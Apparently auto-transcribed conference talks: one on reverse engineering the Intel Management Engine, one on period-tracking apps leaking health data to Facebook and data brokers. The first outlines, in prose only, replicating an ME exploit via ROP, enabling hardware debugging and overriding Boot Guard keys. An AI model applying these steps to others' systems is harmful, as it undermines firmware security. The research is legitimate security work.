that you can now write to. So that's a really nice abstraction. And it also gives us a lot of information because the really old builds for sunrise point actually have a hell of a lot of debug strings in there as printf format strings, not as fen catalog IDs. It's one of the only pieces of code for YME that does this. So that already tells you a lot. And then there's also the table that it just talks about that has the actual info on the devices and names. So I generated some docu wiki content from this that I use myself and this is what's in the table. Part of it. So it tells you what address the PCI configuration space lives at. It tells you the bus device function for it through that. It tells you on what chipset SKUs they are present using a bit field. And it tells you their names. In different fields it also contains the values that are used to write the base average of the registers for PCI. So also their normal memory ranges. And there's even more devices. So YME has access to a lot of stuff. A lot of it is private to it. A lot of it is components that also exist in the rest of the computer. And there's not a lot of information. A lot of this. These are basically all the things that are out there together with the conference slides published by other people who have done research on the YME. I did not have time to add links to those but they're easy to find on Google. I'll get later to this but I actually wrote a emulator for the YME partial emulator to be able to run YME code and analyze it. Which obviously needs to know a bit about hardware so you can look at that. There's some files in Intel's debugger package that specific versions of that have really detailed info on some of the devices. Also not all of it. And I wrote some tool to parse some of the files. It's really rough code. I published it because people wanted to see what I was doing. It doesn't work out of the box. And there's a nice talk on this by Mark Erumelow and Maxime Gorillacchi. I don't know if I'm pronouncing that correctly but they've done a lot of work on the YME and this particular talk by them is really useful. And then there's also something else. There is a second YME in server chipsets, the innovation engine. It's basically the copy pasted YME to provide a YME that the vendor can write code for. I don't think it's used a lot. I've only been able to find HP software that actually targets it. And that has some more debug strings but also not a lot. It mostly has a table containing register names but they're really abbreviated. For a really small subset of the devices there is documentation out there in a Pentium NNJ series data sheet. It seems like they compiled their logic code or whatever with the wrong defines because it doesn't actually fit into the manual that well. It's just a section that has like some 20 tables that shouldn't be in there. Right. So this is from that talk. I just referenced. It's an overview of the innovation engine and the bus bridges and everything in there. This isn't like very precise. So based on some of those files from System Studio I tried to get a better understanding of this. Which is this. This is the entire chipset. The little DMI block in the top left corner is what connects to your CPU. And all of the big blocks with a lot of ports are bus bridges or switches for PCI Express like fabric. Yeah. So there's a lot going on. The highlighted area is the management engine memory space. And the rest of it is like the global chipset. Well, the things I've highlighted in green here are on the primary PCI bus. So there's this weird thing going on where there seems to be two PCI hierarchies, like at least logically. So in reality it's not even PCI, but on Intel systems there's a lot of stuff that behaves as it is PCI. So it has like bus device function numbers, PCI configuration space registers. And they have two different routes for the configuration space. So even though the configuration space address includes a bus number, they have two completely different things with each of which has its own bus zero. So that's weird also because they don't make sense when you look at how the hardware is laid out. So this is stuff that's on the primary PCI configuration space that's directly accessed by the Northridge on the ME CPU. So that's the minute IA system agent. System agent is what Intel calls the Northridge nowadays. Now that's not a separate chip anymore. It's basically just the Northridge and the crypto unit that's on there. And the stuff that's directly attached to Northridge being the ROM and the RAM. So the processor itself is, as I said, derived from a 486, but it does actually have some more modern features. It does CPU ID, at least on my systems. Some other researchers said theirs didn't. It's basically the core that's in the Cork MCU, which is really great because it's one of the only cores made by Intel that has public documentation on how to do ROM control, so breakpoints and accessing registers and everything over JTAG. Intel doesn't publish this stuff except for the Cork MCUs because they were targeted at makers. But they reuse that in here, which is really useful. It even has an official port to the OpenOCD debugger, which I have not gotten to test because I don't have a JTAG probe, which is compatible with Intel voltage levels and supported by OpenOCD. And it also has, like I said, CPU ID and MSRs. It has some really fancy features like branch tracing and some more strict paging permission enforcement stuff. They don't use the interrupt pins on this. So it's an IP block, but if there's some files out there, that's where this screenshot is from, that actually are used by a built-in logic analyzer Intel has on the chipset. And you can select different signals on the chip to watch, which is a really great source of information on how the IP blocks are laid out and what signals are in there because you basically get a tree view of the IP blocks and chip and some of their signals. They don't use the legacy interrupt system. They only use, like, message-based interrupts by where the device writes a value into a register on the interrupt controller instead of asserting a pin. And then there's the Northbridge. Northbridge is partially documented in that datasheet I mentioned. It does support X86 IO address space, but it's never used. Everything in the ME is a memory space or exposed as memory space through bridges. The Northbridge implements access to the ROM, it has a IOMMU, which is only used for transactions coming from the rest of the system, and it's always initialized to, like you said, at least in the form where I looked at, it's always initialized to the inverse of the page shable, so linear addresses can be used for memory map, sorry, for DMA. It also does PCI configuration space access to the primary PCI bus, and it has a firewall that actually allows the operating system to deny any IP block in the chipset from sending a completion on the bus request, so it can actually say, hey, I want to read some register, and only these devices are allowed to send me a value for it. So they've actually thought about security here, which is great. And there's one of the most important blocks in the ME, which is the crypto engine, and it does some of the more well known crypto algorithms, AES, SHA, hashes, RSA, and it has a secure key store, which I'm not going to talk a lot about in their ME talk at Black Hat. And a lot of these things have DMA engines, which all seem to be the same. And there is no other DMA engines in the ME, so this is also used for memory to memory copy or DMA into other devices. So that's used in a lot of things. This is actually a diagram which I don't have the vector for anymore, so that's why the LibreOffice background is in there, I'm sorry. So this is basically what that crypto engine looks like when you look at that signal tree that I was talking about earlier. The DMA engines are both able to do memory to memory copies and to directly target the crypto unit they're part of. Basically, I don't know about the control bits that go with this, but when you set the target address to zero and the right control bits, it will copy into the buffer that's used for the encryption. So that is how it accelerates memory access for crypto. And these are the actual register offsets. They're the same for all of the DMA engines in there relative to the base address of the subunit they're in. And then there's the second PCI bus or bus hierarchy, which is like in some places called the PCI fixed bus. I'm actually not entirely sure whether this is actually implemented as a PCI bus as I've drawn it here, but this is what it behaves like. So it has all the DME private stuff that's not a part of the normal chipset. So it has timers for the DME, it has the implementation of the SQR enclave stuff, the firmware TPM registers, and it has the gen device, which I've mostly ignored because it's only used at boot time. It's only used by the actual boot ROM for the DME mostly. It is what DME uses to get the fuses Intel burns. So that's the Intel public key and whether it's a production or pre-production part, but it's pretty much a black box. It's not used that much, fortunately. There's the IPC block, which allows DME to talk to the sensor hub, which is a different CPU in the chipset. It allows it to talk to the power management controller and all kinds of other embedded CPUs. So it's inter processor communication, not inter process. Confuse me for a bit. And there's the host embedded controller interface, which is how DME talks to the rest of the computer when it wants the computer to know that it's talking. So it can directly access a lot of stuff, but when it wants to send a message to the EFI or to Windows or Linux, it'll use this. And it also has status registers, which are really simple things where DME writes in a value and even if DME crashes, the host can still read the value, which is actually how you can see whether DME is running, whether it's disabled, whether it fully booted or whether it crashed halfway through, but at a point where it could still get the rest of the computer running. And there is some core boot code to read it. And I've also implemented some decoding for it on the emulator because it's useful to see what those values mean. Right. So then there's something really interesting, the primary address translation table, which is the bus bridge that allows DME to actually access the PCI Express fabric of the computer. For a lot of the, what I, in this table, call ME peripherals that are actually outside the DME domain in the chip set, it uses this to access it. It also uses it to access the UMA, which is an area of host RAM that's used as a swap device for DME and a traceup, which is the debug port, but also has a couple of windows which allow DME to access any random area of host RAM, which is the most scary bit because UMA is specified by host, but the host DRAM area is, or you can just point it anywhere, you can read or write any value that Windows or Linux or whatever you're running has sitting there. So that's, that's scary to me. Right. So, and then there's the rest of it in the, the rest of the devices which are behind the primary ATT. And that's a lot of stuff. That's debug. That's also the old and normal peripherals that your PC has, but it's, also includes things like the power management controller, which actually turns on and off all the different parts of your computer. It controls clocks and reset. So this is really important. There's a concept that you'll come across when you're reading Intel manuals or ME related stuff. That's root spaces. Besides your normal addressing information for a PCI device, it also has a root space number, which is basically how you have a single PCI device exposing two completely different address spaces. And it's zero for the host. It's one for the ME. Some devices exposed the same information on their other ones behave completely different. But yeah, that's something you don't usually see. And then there's the sideband fabric. So besides all the stuff that I just covered, which is PCI like, at least there's also something completely different sideband fabric, which is a completely packet switch network where you don't use any memory mapping by default. You just have a one byte address for a device and some other addressing fields and you just send it a message saying, hey, I want to read configuration or data or memory. And there's actually a lot of information out there on this because Intel, it seems like they just copy pasted their internal specification into a patent. This is how you address it. This is all the devices on there, which is quite a lot. It's also what you, if any of you are kernel developers and you've had to deal with GPIOs on Intel SOCs, there's this P2SB device that you have to use. That's what the host uses to access this. Their documentation on it is really, really bad. Right. So this was all done using static analysis, but then I wanted to figure out how some of the logic actually worked and it was really complicated so I wanted to play around with VME. There was this nice talk by Irmolov and Goriachi, where they said, you know, we found an exploit that gives you code execution and you can get JTEC access to it. It sounds really nice. It's actually not that easy. So arbitrary code execution in the bug module, they actually described their exploit and how you should use it. But they didn't describe anything that's needed to actually implement that. So if you want to do that, what you need to do, you need to figure out where the stack lives. You need to know, you need to write a payload that will actually get it from a buffer overflow on a stack that, by the way, uses stack cookies. So you can't just overwrite the return address. To turn that into an arbitrary write. And you need to find out what the return pointer at adversities so you can overwrite it. I need to find ROP gadgets because the stack is not executable. Right. So then, and then when you've done that, you can just turn on debug access or a chain load a custom firmware or whatever. So what I did is I had a bit of trouble getting that running and in order to test your payload, you have to flash it into the system and it takes a while and then the system just doesn't power on if the ME is not working, if you're crashing it instead of getting code execution. So it's not really viable to develop it that way, I think. Some people did. I respect that because it's really, really hard. Then I wrote this, ME loader. It's called loader because at first I started out like writing it as sort of a wine thing where you would just map the right ranges at the right place and jump into it, execute it, patch some system calls. But because the ME is a micro-curnal system and almost every user space program accesses hardware directly, it ended up implementing like a good part of the chipset, at least as stubs or enough logic to get the code running. And I later on added some features that actually allowed to talk to hardware. I can use it as a debugger because it's actually running the ME firmware or parts of it inside a normal Linux process. I can just use GDB to debug it. And back in April last year, I got that working to the point where I could run the bootstrap process, which is where the vulnerability is. And then you just develop the exploit against it, which I did. And then I made a mistake cleaning up some old change route environments for close source software and I nuked my home, dear. Yeah. I hadn't yet pushed everything to GitHub. So I stuck with an old version and I decided, you know, let's refactor this and turn it into something that might actually at some point be published, which by the way I did last summer, this is all public code, the ME loader thing. It's on GitHub. And someone else beat me to it and replicated that exploit by the Russian guys, which up to then they had produced a proof of concept thing for Apollo chipsets, Apollo 8 chipsets, which were completely different from what you had to do for normal ME. So that's actually, I was a bit disappointed by that not being the first one to actually replicate this. But then I did about a week later, I got my loader back to the point where I could actually get to the vulnerable code and develop that exploit and got it working not too long after. And here's the great thing. Then I went to the hacker space, I flashed it into my laptop. The image that I had just been using on the emulator. I didn't change it. I flashed it. I was like, this is never going to work and it worked. And I've still got an image on a flash chip with me because that's what I used to actually turn on the debugger. And then you need a debug probe because that USB-based debugging stuff that's mentioned here only works pretty late in boot, which is also why they only release the Apollo 8 stuff because on those chipsets you can actually use this for the ME. And then you need this thing because there's a second channel that is, it's using a USB plug but it's a completely different physical layer and you need an adapter for it, which I don't think was intended to be publicly available because if you go to Intel site and say I want to buy this, they say here's the CNDA, please sign it. But it appeared on Mauser. And luckily I knew some people who had done some other stuff, got a nice bounty for it and bought it and let me use it. Thanks. It's expensive, but you can buy it if it's still up there. Haven't checked. That's the link. So I'm a bit late so I'm going to use the time for questions as well. So the main thing the ME does that you cannot replace is the boot process. It's not just breaking the system if you don't turn it on, it actually does stuff that has to be done. So you're going to have to use the ME anyway if you want to boot a computer. Don't necessarily have to use Intel's firmware though. The ME itself boots like a microkernel system so it has a process which implements a lot of the servers that will allow it to get to a point where it can start those servers. This process is very high privileges in older versions which is what's being used on these chipsets. If you exploit that, you're still ring three but you can turn on debugger and you can use the debugger to become ring zero. So this is what normal boot process for a computer looks like and this is what happens when you use boot guard. There's a bit of code that runs even before the reset vector and that's started by microcode initialization of course and this is what actually happens. The ME loads a new firmware into a power management controller, it then readies some stuff in a chipset and it tells the power management controller like please stop pulling that CPU reset pin low and the CPU will start. Power management controller is a completely independent thing. It's a 8051 drive microcontroller, runs real time operating system from the 90s. This is the only string in the firmware by the way that's quoted there. Depending on the chipset you have, it's either loaded with a patch or with a complete binary from the ME and it does a lot of important stuff. No documentation on it besides the ACPI interface which is not really any useful. The ME has to do these things. It needs to load the keys for the boot guard process. It needs to set up clock controllers and then tell the PMC to turn on the power to the CPU. It needs to configure PCI express fabric and get the CPU to come out of reset. There's a lot of code involved in this so I really didn't want to do this all statically. What I did is I added hardware pass through support to the emulator and booted my laptop that way. I actually had a video of this but I don't have the time to show it which is a pity. This is what I had going on. I had the bring up process from the ME running in a Linux process, sending whatever hardware accesses it was trying to do that are important for boot to the debugger and then that was using a ME in real hardware that was halted to actually do the register accesses and it worked. It actually booted the computer reliably. Then boot guard configuration is fun because where they say they fuse in the keys, well, yeah, but the ME loads them from fuses and then manually loads them into a register. If you have code execution on the ME before it does this, you can just load your own values and you can run core boot even on a machine that has boot guard. I'm going to go through this really quickly. These are the registers that configure what security model the CPU is going to enforce for the firmware. I'm going to release this code after my talk. It's part of a Python script that I wrote that uses the debugger to start the CPU without ME firmware. I traced all the accesses the ME firmware did and I now have a Python script that can just start the computer without Intel's code. If you translate this into a ROP sequence or even into binary for the ME, you can start a computer without the ME itself or at least without it running the operating system. So yeah, future goals really do want to share this because if there is a way to escalate to ring zero through the ROP chain, then you could just start your own kernel on the ME and have custom firmware at least from the vulnerability on. But you could also build a mod chip that uses the debugger interface to load a new firmware. There's lots of facilities to be discovered, but I'm going to hang out at the open source firmware a village later, at least part of the week here. Because I really want to get started on an open source and ME firmware using this. Right. And there's a lot of people that played a role in getting me to this point. Also would like to thank a guy from my hackerspace, Pino Alpha, who basically allowed me to use his laptop to prepare the demo, which I ended up not being able to show. But right. I was going to ask whatever were any questions, but I don't think there's really any time for that anymore. Peter, thank you so much. Unfortunately, we don't have any more time left. I'll be around. I think it's very, very interesting because I hope that your talk will inspire many people to keep looking into how the management engine works and hopefully uncover even more stuff. I think we have time for just one single question. I don't know. Do we have one from the internet? Thank you so much. Okay. First off, I have to tell you your shirt is nice. Chad wanted me to say this. And they asked how reliable this exploit is and does it work on every boot? Right. Yeah. That's actually something really important that I forgot to mention. So they patched the vulnerability, but they didn't provide downgrade protection. If you can flash a vulnerable image with an exploit in it, it'll just boot every time on these chipsets. So six, seven generation chipsets put in that image and it will reliably turn on the debugger every time you turn on the computer. Thank you so much for the question and Peter, please thank you so much. Please give him a great round of applause.
Reverse engineering a system on a chip from sparse documentation and binaries, developing an emulator from it and gathering the knowledge needed to develop a replacement for one of the more controversial binary blobs in the modern PC. The Intel Management Engine, a secondary computer system embedded in modern chipsets, has long been considered a security risk because of its black-box nature and high privileges within the system. The last few years have seen increasing amounts of research into the ME and several vulnerabilities have been found. Although limited details were published about these vulnerabilities, reproducing exploits has been hard because of the limited information available on the platform. The ME firmware is the root of trust for the fTPM, Intel Boot Guard and several other platform security features, controlling it allows overriding manufacturer firmware signing, and allows implementing many background management features. I have spent most of past year reverse engineering the OS, hardware and links to the host (main CPU) system. This research has led me to create custom tools for manipulating firmware images, to write an emulator for running ME firmware modules under controlled circumstances and allowed me to replicate an unpublished exploit to gain code execution. In this talk I will share the knowledge I have gathered so far, document my methods and also explain how to go about a similar project. I also plan to discuss the possibility of an open source replacement firmware for the Management Engine. The information in this talk covers ME version 11.x, which is found in 6th and 7th generation chipsets (Skylake/Kabylake era), most of the hardware related information is also relevant for newer chipsets.
10.5446/53181 (DOI)
So, it is my honor to introduce you today to Eva and Chris. Eva, she is a senior researcher at Privacy International. She works on gender, economical, and social rights, and how they interplay with the right to privacy, especially in marginalized communities. Chris, she is the technology lead at Privacy International, and his day-to-day job is to expose company and how they profit from individuals. And specifically today, they will tell us how these companies can even profit from your menstruations. Thank you. Thank you. Hi, everyone. It is nice to be back at CCC. This talk is going to be a slight vague part two. If you are not, I will give you a very brief recap because there is a relationship between the two. So, yeah, this, I say, give a little bit of background about how this project started. Then we are going to talk a little bit about administration apps and what an administration app actually is. Then we are going to talk a little bit through some of the data that these apps are collecting. We are going to talk through how we did our research, our research methodology, and then what our findings are and our conclusions. So, last year, I and a colleague did a project around how Facebook collects data about users on Android devices using the Android Facebook SDK. And this is whether you have a Facebook account or not. And for that project, we really looked when you first opened apps and didn't really have to do very much interaction with them, particularly about the automatic sending of data in a post-GDPR context. We looked at a load of apps for that project, including a couple of theory trackers. That kind of led onto this project because we looked at loads of apps across the disparate different areas of categories. We thought we would hone in a little bit on period trackers to see what kind of data. Because they are far more sensitive than many of the other apps on there. You might consider music history to be very sensitive. Just as a quick update on the previous work from last year, we actually followed up with all of the companies from that report. By the end of going through multiple rounds of response, over 60% of them have changed practices either by disabling the Facebook SDK in their app or disabling it until you gave consent or removing it entirely. So, I'm going to pass over to Eva Blondemonte. She's going to talk through the administration. I just want to make sure we're all on the same page. Although, if you didn't know what administration apps are, and you still bothered coming to this talk, I'm extremely grateful. How many of you are using an administration app or have a partner who's been using an administration app? Oh, my God. I didn't expect that. I thought it was going to be much less. I thought if you might not know what an administration app is, the idea of an administration app, we also call them period tracker, is to have an app that tracks your administration cycle. Today, they tell you what day is your most fertile. You can obviously, if you're using them, to try and get pregnant. If you have, for example, a painful period, you can plan accordingly. So that's essentially the main two reasons users would be looking into using an administration app's pregnancy period tracking. Now, how did this research start? As Chris said, obviously, there was this whole research that had been done by Privacy International last year on various apps. As Chris also already said, what I was particularly interested in was the kind of data that administration apps are collecting. As we'll explain in this talk, it's really actually not just limited to an administration cycle. So, I was interested in seeing what actually happens to the data when it is being shared. So I should say we're really standing in the shoulders of giants when it comes to this research. There was previously existing research on administration apps that was done by a partner organization coding rights in Brazil. So they had done research on the kind of data that was collected by administration apps and the granularity of this data. And yet, a very interesting thing that we're looking at was the gender normativity of those apps. Chris and I have been looking at dozens of those apps and they have various data sharing practices as well, explaining the stock. They have one thing that all of them have in common is that they are all pink. The other thing is that they talk to their users as women. They don't even compute the fact that maybe not all their users are women. So there is a very sort of like narrow perspective of like pregnancy and female's bodies and how does female sexuality function. Now, as I was saying, when you're using a main creation app, it's not just your main creation cycle that you're entering. So this is some of the questions that main creation apps ask. So sex, there's a lot about sex that they want to know. How often is it protected or unprotected? Are you smoking? Are you drinking? Are you partying? How often? We even had one app that was asking about masturbation, your sleeping pattern, your coffee drinking habits. One thing that's really interesting is that, and we'll talk a little bit more again about this later, but there is very strong data protection laws in Europe called GDPR as most of you will know. And it says that only data that's really necessary should be collected. So I'm still unclear what masturbation has to do with tracking your main creation cycle. Other thing that was collected is about your health. And the reason health is so important is also related to data protection laws because when you're collecting health data, you need to show that you're taking extra step to collect this data because it's considered sensitive personal data. So extra step in terms of getting explicit consent from the users, but also extra step on behalf of the data controller in terms of showing that they're making extra step for the security of this data. So this is the type of question that was asked. There's so much asked about vaginal discharge and kind of vaginal discharge again was all sorts of weird objectives for this, tiki creamy. So yeah, they clearly thought a lot about this. And there's a lot about mood as well. Even yeah, I didn't know romantic was a mood, but apparently it is. And what's interesting obviously about mood in the context where we've seen stories like Cambridge Journal, for example, so we know how much companies, we know how much political parties are trying to understand how we think, how we feel. So that's actually quite significant that you have an app that's collecting information about how we feel on a daily basis. And obviously, when people enter all this data, their expectation at that point is that the data stays between them and the app. And actually there is very little in the privacy policy that would normally suggest otherwise. So this is the moment where I actually should say we're not making this up. Literally everything in this list of questions were things, literal terms that they were asking. So we set up to look at the most popular administration apps. Do you want to? Yeah, I forgot to introduce myself as well. Really, that's terrible speaking habit. Christopher Weatherhead. Yep, Privacy International's technology lead. So yeah, as I said about my previous research, we have actually looked at most of the very popular administration apps, the ones that have hundreds of thousands of downloads. These apps, as we were saying, this kind of work has been done before. And a lot of these apps have come into quite a lot of criticism. I'll spare you the free advertising about which ones particularly. But most of them don't do anything particularly outrageous, at least between the app and the developer's servers. A lot of them don't share with third parties at that stage, so you can't look between the app and the server to see whether they're sharing. They might be sharing data from the developer's server to Facebook or to other places, but at least you can't see in between. But we're an international organization and we work around the globe. And most of the apps that get the most downloads are particularly Western, US, European, but they're not the most popular apps necessarily in a lot of contexts like India and the Philippines and Latin America. So we thought we'd have a look and see those apps. They're all available in Europe, but they're not necessarily the most popular in Europe. And this is where things start getting interesting. So what exactly did we do? Well, we started off by triaging through a large number of period trackers. And as Eva said earlier, every logo must be pink. And we were just kind of looking through to see how many trackers. This is using extra privacy. We have our own instance in PI. And we just looked through to see how many trackers and who the trackers were. So for example, this is Maya, which is exceptionally popular in India predominantly. It's made by an Indian company. And as you can see, it's got a large number of bundled trackers in it. Clevitat, Facebook, Flurry, Google, and in mobile. So we went through this process. This allowed us to cut down because there's hundreds of period trackers. Not all of them are necessarily bad, but it's nice to try and see which ones had the most trackers where they were used and try and just triage them a little bit. From this, we then ran through PI's interception environment, which is a VM that I made. I actually made it last year for the talk I gave last year. And I said I'd release it after the talk, and it took me like three months to release it. But it's now available. You can go onto PI's website and download it. It's a man in the middle proxy with a few settings, mainly for looking at iOS and Android app to do data interception between them. And so we ran through that. And we get to have a look at all the data that's being sent to and from both the app developer and third parties. And here's what we found. So out of the six apps we look at, five shared data with Facebook. And out of those five, three ping Facebook to let them know when they're users, when we're downloading the app and opening the app. And that's already quite significant information, and we'll get to that later. Now what's actually interesting, and the focus of our report was on the two apps that shared every single piece of information that the users entered with Facebook and other third parties. So just to brief you, the two apps we focused on are both called Maya. So that's not very helpful. One is spelled Maya, M-A-Y-A. The other one is spelled Maya, M-I-A. So yeah, just bear with me because this is actually quite confusing. But so initially we'll focus on Maya, M-Y-A, which is, as Chris mentioned, it's an app that's based in India. They have a user base of several millions. They are based, yeah, based in India, user base mostly in India, also quite popular in the Philippines. So what's interesting with Maya is that they start sharing data with Facebook before you even get to agree to their privacy policy. So I should say already about the privacy policy of a lot of those apps that we looked at is that they're literally the definition of small prints. It's very hard to read. It's legally language. It really puts into perspective the whole question of consents in GDPR because GDPR says that consents must be informed. So you must be able to understand why you're consenting to. When you're reading those extremely long, extremely opaque privacy policies of literally all the PRMAPs we've looked at, excluding one that didn't even bother putting their privacy policy actually, it's opaque. It's very hard to understand. And they absolutely definitely do not say that they're sharing information with Facebook. So as I said, data sharing happens before you get to agree to their privacy policy. The other thing that's also worth remembering is that when they share information with Facebook, doesn't matter if you have a Facebook account or not, the information is still being relayed. The other interesting thing that you'll notice as well in several of the slides is that the information that's being shared is tied to your identity through your unique ID identifiers, also your email address. But basically, most of the questions we got when we released the research was like, oh, if I use a fake email address or if I use a fake name, is that OK? Well, it's not because even if you have a Facebook account through your unique ID identifier, they would definitely be able to trace you back. So there is a little way to actually anonymize this process. Unless you're deliberately trying to trick it and use a separate phone, basically for regular users, it's quite difficult. So this is what it looks like when you enter the data. So as I said, didn't like you. This is the kind of questions they're asking you. And this is what it looks like when it's being shared with Facebook. So you see the symptom changing, for example, like blood pressure, swelling, acne. This is all being shared through graph.facebook, through the Facebook SDK. This is what it looks like when they shared your contraceptive practice. So again, we're talking health data here. We're talking sensitive data. We're talking about data that should normally require extra steps in terms of collecting it, in terms of how it's being processed. But nope, in this case, it was shared exactly like the rest. This is what it looks like. So yeah, with sex life, it was a little bit different. So this is why it looks like when they're asking you about, you know, you just had sex, was it protected, was it unprotected? The way it was shared with Facebook, it was a little bit more cryptic, so to speak. So if you have protected sex, it was entered as love to unprotected sex. It was entered as love three. I managed to figure that out pretty quickly, so it's not so cryptic. So yeah, that's also quite funny. So Maya had a diary section where they encouraged people to enter their notes and their personal thoughts. I mean, it's a main creation app, so you can sort of get the idea of what people are going to be writing down in there, or I expected to write on it. It's not going to be their shopping list. Although shopping links could also be personal, sensitive personal information. So we were wondering what would happen if we were to write in this diary and how this data would be processed. So we entered, literally we entered something very sensitive, entered here. This is what we wrote. And literally everything we wrote was shared with Facebook. Maya also shared your health data, not just with Facebook, but with a company called Clevver Tap, that's based in California. So what's Clevver Tap? Clevver Tap is a data broker basically. It's a company that is sort of similar to Facebook with the Facebook SDK. They expect app developers to hand over the data and in exchange, app developers get insights about how people use the app, what time of the day, the age of their users. They get sort of information and analytics out of the data that they share with this company. It took us some time yet to figure it out because it shared as a wicked wizard. Wicked rocket. Wicked rocket, yeah. Yeah, but that's exactly the same. Everything that was shared with Facebook was also shared with Clevver Tap. Then with the email address that we were using, everything was shared. Now let's look at the other Maya. It's not just the name that's similar, it's also the data sharing practices. Maya is based in Cyprus, so in European Union. I should say in all cases, regardless of where the company is based, the moment that they market the product in European Union, so literally every app we looked at, they should respect GDPR, European data protection law. Now the first thing that Maya asks when you're starting the app, and again I'll get you that later about the significance of this, is why you're using the app. Are you using it to try and get pregnant or are you just using it to try to track your periods? Now it's interesting because it doesn't change at all the way you interact with the app. Eventually the app stays exactly the same, but this is actually the most important kind of data. This is literally called the gem of data collection. It's trying to know when a woman is trying to get pregnant or not. So the reason this is the first question they ask is, well, my guess on this is they want to make sure that even if you don't actually use the app, that's at least that much information they can collect about you. And so this information was created immediately with Facebook and with Appslyer. Appslyer is very similar to Clevver Tap in the way it works. It's also a company that collects data from those apps. And a lot of services in terms of analytics and insights into user behavior, it's based in Israel. So this is why it looks like when you enter the information, so, yeah, masturbation, pills, what kind of pill you're taking, your lifestyle habits. Now where it's slightly different is that the information doesn't immediately get shared with Facebook, but based on the information you enter, you get articles that are tailored for you. So for example, like when you select masturbation, you will get masturbation what you want to know, but are ashamed to ask. Now what's eventually shared with Facebook is actually the kind of article that's being offered to you. So basically, yeah, the information is shared indirectly because then, you know, your Facebook can sort of, did you start, you've just entered masturbation because you're getting an article about masturbation. So this is what happened when you enter alcohol, so expected effects of alcohol in a woman's body is what happened when you enter and protected sex. So effectively, all the information is still shared just indirectly through the articles you're getting. And yeah, last thing also I should say on this in terms of the articles that you're getting is that sometimes they were sort of also kind of like crossing the data. So the articles will be about, like, oh, you have cramps outside of your periods, for example, like during your fertile phase. And so you'll get articles specifically for this. So the information that's shared with Facebook and with AppSliar is that this person is in their fertile period in this phase of their cycles and having cramps. Now why are menstruation apps obsessed with burning up if you're trying to get pregnant? And so this goes back to a lot of the things I mentioned before about wanting to know in the very first place if you're trying to get pregnant or not. And also this is probably why a lot of those apps are trying to really nail down in their language, in their discourse, how you're using the apps for. When a person is pregnant, they're purchasing habits, their consumer habits change. When obviously you buy not only for yourself, but you start buying for others as well. But also you're buying new things you've never purchased before. So what a regular person will be quite difficult to change a purchasing habit was a person that's pregnant. They'll be, advertisers will be really keen to target them because this is a point of their life where their habits changed and where they can be more easily influenced one way or another. So in other words, it's peak advertising time. In other words, in picture, there's research done in 2014 in the US that was trying to evaluate the value of data for a person. So an average American person that's not pregnant was 10 cents. A person who's pregnant would be $1.50. So you may have noticed we're using the past tense when we talked about, well, I hope I did when I was speaking, definitely in the slides at least, we used the past tense when we talked about data sharing of this app. That's because both my and Mia, the two apps were really targeting this report, stopped using the Facebook as a kid when we wrote to them about our research before we published it. So it was quite nice because they didn't even like rely on actually us publishing the report. It was merely at the stage of like, hey, this is already a response. We're going to be publishing this. Do you have anything to say about this? And essentially what they had to say is like, yep, sorry, apologies, we're stopping this. I think what's really interesting as well for me about how quick the response was is it really shows how this is not a vital service for them. This is a plus. This is something that's a useful tool. But the fact that they immediately just stopped using it really shows that it was, I wouldn't see a lazy practice, but it's a case of like, as long as no one's complaining, then they're going to start using it. They're going to carry on using it. And I think that was also the discourse with your research. There was also a lot that changed their behaviors after. A lot of the developers sometimes don't even realize necessarily what data their app is sharing with people like Facebook, with people like Clevittap or whoever. They just integrate the SDK and hope for the best. We also got this interesting response from Matt Slayer. It's very hypocritical, essentially what they were saying is like, oh, like we specifically ask our customers to not share health data with us, specifically for the reason I mentioned earlier, which is because of GDPR, you're normally expected to take extra step when you process sensitive health data. So their response is that they ask their customer to not share health data or sensitive personal data so they don't become liable in terms of the law. They're like, oh, we're sorry, this is a breach of our contract. The reason it's very hypocritical is that obviously when you have contracts with main creation apps, and actually Maya was not yet on the app, the main creation apps that we're working with. I mean, can you generally expect in terms of the kind of data you're going to receive? So here's a conclusion for us. That research works. It's fun. It's easy to do. This has not published the environment. It doesn't actually, once the environment is sort of set up, it doesn't actually require technical background as you saw from the slides. It's pretty straightforward to actually understand how the data is being shared. So you should do it too. But more broadly, we think it's really important to do more research, not just at the stage of the process, but generally about the security and the data sharing practices of apps. Because it's hard a lot, and more and more people are interacting with technology and using the internet. So we need to think much more carefully about the security implication of the apps we use. And obviously, it works. Thank you. So, yeah, please line up in front of the microphones. We can start with microphone two. Hi, thank you. So you mentioned that now we can check whether data is being shared with third parties on the path between the user and the developer, but we cannot know for the other options for these whether it's not being shared later from the company to other companies. Have you thought of, have you conceptualized some ways of testing that? Is it possible to? Yeah, so you could do a data subject access request under the GDPR. And the problem is it's quite hard to necessarily know how the process is. The system outside of the app to serve a relationship, it's quite hard to know what the process is of that data. And so it's quite opaque. They might apply a different identifier to it. They might do other manipulation of that data. So trying to track down and prove that this bit of data belong to you is quite challenging. This is something we're going to try. We're going to be doing in 2020, actually. We're going to be doing data subject access request of those apps that we've been looking up to see if we find anything, both under GDPR but also under different data protection laws in different countries to see basically what we get, how much we can obtain from that. So I'd go with the signal, Angel. So what advice can you give us on how we can make people understand that from a privacy perspective, it's not better to use pen and paper instead of entering sensitive data into any of these apps? I definitely wouldn't advise that. I wouldn't advise pen and paper. I think for us, really the key, the work we're doing is not actually targeting users. It's targeting companies. We think it's companies that really need to do better. We'll often ask about advice to customers or advice to users and consumers. What I think and what we've been telling companies as well is that their users trust you and they have the right to trust you. They also have the right to expect that you're respecting the law. The European Union has a very ambitious legislation when it comes to privacy with GDPR. And so the least they can expect is that you're respecting the law. And so, no, this is the thing. I think people have the right to use those apps. They have the right to say, well, this is a useful service for me. It's really companies that need to up their game, that need to live up to the expectations of their consumers, not yet aware of. Hi, so from the talk, it seems, and I think that's what you did, you mostly focused on Android-based apps. Can you maybe comment on what the situation is with iOS? Is there any technical difficulty or is it anything completely different with respect to these apps and apps in general? There's not really a technical difficulty. The setup's a little bit different, but functionally you can look at the same kind of data. The focus here, though, is also, so it's twofold in some respects. Most of the places that these apps are used are heavily dominated Android territories, like India, the Philippines, iOS penetration, and Apple device penetration is very low. There's no technical reason not to look at Apple devices, but in this particular context, it's not necessarily hugely relevant. Does that answer your question? And technically, with your setup, you could also do the same analysis with an iOS device. Yeah, this says a little bit of a change to how you have to register the device as an MDM device, like have a profile, a mobile profile, but otherwise you can do exactly the same level of interception. Hi. My question is actually related to the last question. It's a little bit technical. I'm also doing some research on apps, and I've noticed with the newest versions of Android that they're making it more difficult to install custom certificates to have this pass through and check what the apps are actually communicating to their home servers. Have you found a way to make this easier? Yes, so we actually hit the same issue. You are in some respect. So the installing of custom certificates was not really an 